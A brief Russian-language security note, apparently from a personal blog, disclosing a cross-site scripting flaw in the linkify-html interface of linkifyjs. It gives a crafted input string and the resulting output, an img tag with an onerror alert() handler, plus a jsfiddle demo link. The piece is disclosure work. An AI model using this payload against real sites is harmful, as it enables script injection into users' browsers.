все заметки

XSS in linkifyhtml (linkifyjs/html) by soapbox

2020.07.27

linkify-html is an interface (linkifyjs) for replacing links

Code:

linkifyHtml('< 123; `~ img/src/onerror=alert()');\n

Result:

<img src="" onerror="alert()">\n

check it

check it @ jsfiddle.net

еще по теме: xss